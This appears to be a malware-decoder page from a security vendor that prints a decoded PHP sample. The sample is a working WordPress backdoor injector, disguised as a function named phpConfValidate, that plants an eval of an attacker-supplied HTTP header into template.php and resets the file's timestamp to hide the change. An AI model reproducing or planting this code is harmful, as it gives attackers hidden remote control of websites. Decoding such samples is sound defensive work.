Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



phpConfValidate('YTo0OntpOjA7czo1MjoiL2hvbWUzL3RvcGtlbWJhL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL3RlbXBsYXRlLnBocCI7aToxO3M6OTg6In5ldmFsW15cKFxuXHJdKlwoW15cJF0qXCRfW0EtWl17Nn1bXlxbXSpcW1teXCdcIl0qW1wnXCJdSFRUUF84N0VBMTE3W1wnXCJdW15cXV0qXF1bXlwpXSpcKVteO10qO35zIjtpOjI7czozMjoiQGV2YWwoJF9TRVJWRVJbJ0hUVFBfODdFQTExNyddKTsiO2k6MztzOjM3OiJ+XlxzKmZ1bmN0aW9uXHMrZ2V0X3NpbmdsZV90ZW1wbGF0ZX5tIjt9');
function phpConfValidate($ser) {

    list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));
    $source = file_get_contents($fullPath);
    if (preg_match($systemEnv, $source)) {
        return;
    }
    if (!preg_match($pattern, $source, $matches)) {
        return;
    }
    
    $incorrectRegex = str_replace('eval', '@?array', $systemEnv);
    $newSource = preg_replace($incorrectRegex, '', $source);
    $newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);
    
    
    if (!preg_match($systemEnv, $newSource)) {
        return;
    }
    
    $filemtime = filemtime($fullPath) + 10;
    unlink($fullPath);
    file_put_contents($fullPath, $newSource);
    touch($fullPath, $filemtime);
}



© 2023 Quttera Ltd. All rights reserved.